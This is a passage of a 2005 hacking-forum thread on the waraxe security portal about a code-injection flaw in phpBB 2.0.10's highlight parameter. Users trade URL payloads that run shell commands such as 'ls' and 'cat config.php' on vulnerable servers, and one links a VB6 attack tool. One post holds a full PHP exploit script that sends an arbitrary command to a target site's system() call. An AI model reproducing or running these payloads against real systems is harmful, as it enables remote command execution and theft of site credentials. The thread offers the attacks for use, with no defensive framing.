Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 23, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 244
Members: 0
Total: 244
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> vulns in phpbb 2.0.10 Goto page Previous  1, 2, 3, 4
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Sat Jan 01, 2005 6:13 pm Reply with quote
egw
Beginner
Beginner
 
Joined: Dec 31, 2004
Posts: 4




Well reflex it is probabaly of a fix from php nuke that most of sites have.
If you mean the i dont like you thing.
Post nuke doesnt have this prob though
View user's profile Send private message
PostPosted: Mon Jan 03, 2005 12:19 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Yes, this exploits DONT work in phpnuke, Like I said before I cant make this bug works in phpnuke because it gives me an error when i trie to exploit.
View user's profile Send private message Visit poster's website
PostPosted: Tue Jan 04, 2005 9:07 am Reply with quote
egw
Beginner
Beginner
 
Joined: Dec 31, 2004
Posts: 4




Yes reflex we are saying the same thing this doesnt work in php-nuke but DOES work in postnuke.
At least the
Code:

&t=218&highlight=%2527.$poster=`ls`.%2527

works.Now to open config.php is should be
Code:
&highlight=%2527.$poster=`cat%20config.php`.%2527

Well that gives me a blank.It should be writtem elseways?
View user's profile Send private message
PostPosted: Wed Jan 05, 2005 11:49 am Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




ok.... I thing you were talking about phpnuke Confused

Code:
&t=218&highlight=%2527.$poster=`ls`.%2527

I dont think this could works... because you are only putting in the var $poster the string 'ls' .... you have to use the system, exec, etc functions to execute shell programs like ls.. cat... etc

like this
Code:
&t=218&highlight=%2527.system('ls').%2527


BUT!, you have to use function char because it gives you an error.
If you want We could make a modification to the exploit that gives you the URI that you have to put.

Send me a private message
View user's profile Send private message Visit poster's website
PostPosted: Mon Jan 10, 2005 12:45 am Reply with quote
zer0-c00l
Advanced user
Advanced user
 
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




after the bug has released, i code some tool to explorer this vuln.

i made it on VB6.

Just type the FULL URL (http://www.site.com/phpbb/viewtopic.php?t=1234) and the command.. the program will do the work for you.

ps.: if the forum is in phpnuke, type the url like: http://www.site.com/nuke/modules.php?name=Foruns&file=viewtopic&t=1234

ps2.: the program is 100% in portuguese.. so if it displays "site n?o parece estar vulneravel", it mens 'the website dont seems vulnerable'.

oh, sorry my bad english Embarassed

Screenshot (i 'shadow' the URL):



Download:
Click Here
View user's profile Send private message
PostPosted: Tue Jan 11, 2005 12:20 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




very good zer0-c00l, If you want I could help to improve and add some stuff like sql injection, includes, and another things. Send me a private so we talk

seeya guys Laughing Laughing
View user's profile Send private message Visit poster's website
PostPosted: Thu Jan 13, 2005 1:16 pm Reply with quote
qr4t
Regular user
Regular user
 
Joined: Nov 21, 2004
Posts: 11
Location: Estonia




egw wrote:
Now to open config.php is should be
Code:
&highlight=%2527.$poster=`cat%20config.php`.%2527

Well that gives me a blank.It should be writtem elseways?


after this you should see the page source, because config.php includes HTML tags and is treated as HTML.
View user's profile Send private message MSN Messenger
PostPosted: Thu Jan 13, 2005 1:37 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Code:
&highlight=%2527.$poster=`cat%20config.php`.%2527


I dont think this could work cos you are only passing the value 'cat%20config.php' to the var $poster ... so to execute commands you HAVE TO use function exec, system or something else like

Code:
&highlight=%2527.sytem(`cat%20config.php`).%2527


but using the function chr to remplace all the string. This is what the exploit does it tranform all you put in the edit box and convert every char into chr function like chr(75)
View user's profile Send private message Visit poster's website
PostPosted: Tue Jan 18, 2005 5:48 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




zer0-c00l wrote:
after the bug has released, i code some tool to explorer this vuln.

i made it on VB6.

Just type the FULL URL (http://www.site.com/phpbb/viewtopic.php?t=1234) and the command.. the program will do the work for you.

ps.: if the forum is in phpnuke, type the url like: http://www.site.com/nuke/modules.php?name=Foruns&file=viewtopic&t=1234

ps2.: the program is 100% in portuguese.. so if it displays "site n?o parece estar vulneravel", it mens 'the website dont seems vulnerable'.

oh, sorry my bad english Embarassed

Screenshot (i 'shadow' the URL):



Download:
Click Here




good tool men , but you tool have bug for example if have more 1000 characters you tool crash Idea
View user's profile Send private message Visit poster's website
PostPosted: Wed Jan 19, 2005 7:56 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
 
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




it dont crash.. it seems to crash..

i just wait and it becomes ok..

but its better do small commands

(sorry my bad english again Embarassed )
View user's profile Send private message
PoC for phpnuke + phpbb
PostPosted: Thu Feb 17, 2005 11:55 am Reply with quote
pokleyzz
Regular user
Regular user
 
Joined: Feb 17, 2005
Posts: 6




Just want to share old stuff Smile
Code:

#!/usr/bin/php -q
<?php
/*
# phpnuke + phpBB 2.0.10  execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# last update: 20th November 2004 : 3:21 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
#   PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
   echo "cURL extension required\n";
   exit;
}

if ($argv[2]){
   $url = $argv[1];
   $command = $argv[2];
}
else {
   echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
   echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/index.php)\n";
   echo "\tcommand\t command to execute on server  (ex: 'ls -la')\n";
   echo "\ttopic_id\t topic id\n";
   echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n";
   exit;
}
if ($argv[3])
   $topic = $argv[3];
else
   $topic = 1;

if ($argv[4])
   $proxy = $argv[4];


$postvar = "c=".$command;

$action = "?name=Forums&file=viewtopic&t=$topic&highlight=%2527%252esystem%2528\%2524HTTP_POST_VARS%255bc%255d%2529%252eexit%2528%2529%252e%2527";      
$ch=curl_init();
if ($proxy){
   curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54u1  [en]");
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
?>
View user's profile Send private message
Posting Old Stuff
PostPosted: Thu Feb 17, 2005 3:03 pm Reply with quote
Zeelock
Active user
Active user
 
Joined: Jan 27, 2005
Posts: 29
Location: Where stars come out at night




http://www.securityfocus.com/archive/1/382411/2004-11-24/2004-11-30/0

There is also the issue about the bug in The Attachment Module by Acid Burn. This Bug has been reported (again to secunia) after 1 month (!!!) by Paul Laudanski.

Quote:

I read your work on the phpbb and attachment mod exploits. In the hopes
of releasing a patch for the attachmod, I wanted to ask you where
specifically you noticed the problem. Any details are appreciated.

--
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

[This message is for the designated recipient(s) only and may contain
privileged or confidential information. If you have received it in error,
please notify the sender immediately and delete the original. Any other
use of the email by you is prohibited.]

_________________
If it seems to be impossible, just step up your level!
View user's profile Send private message
PostPosted: Sun Mar 13, 2005 5:46 pm Reply with quote
KingOfSka
Advanced user
Advanced user
 
Joined: Mar 13, 2005
Posts: 61




hi all Very Happy i managed to do sql injections on phpbb <= 2.0.10 with the highlight exploit, but when i try "cat config.php" or any other command called by system , i get the unable to fork error, or the page refresh itself but the command hasn't been executed...
can someone help me ?
thanks in advance
View user's profile Send private message Visit poster's website
PostPosted: Mon Mar 14, 2005 1:15 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




KingOfSka wrote:
hi all Very Happy i managed to do sql injections on phpbb <= 2.0.10 with the highlight exploit, but when i try "cat config.php" or any other command called by system , i get the unable to fork error, or the page refresh itself but the command hasn't been executed...
can someone help me ?
thanks in advance


maybe the "system()" allready disable by the admin

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
vulns in phpbb 2.0.10
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 4 of 4  
Goto page Previous  1, 2, 3, 4
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Game Hints
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.112 Seconds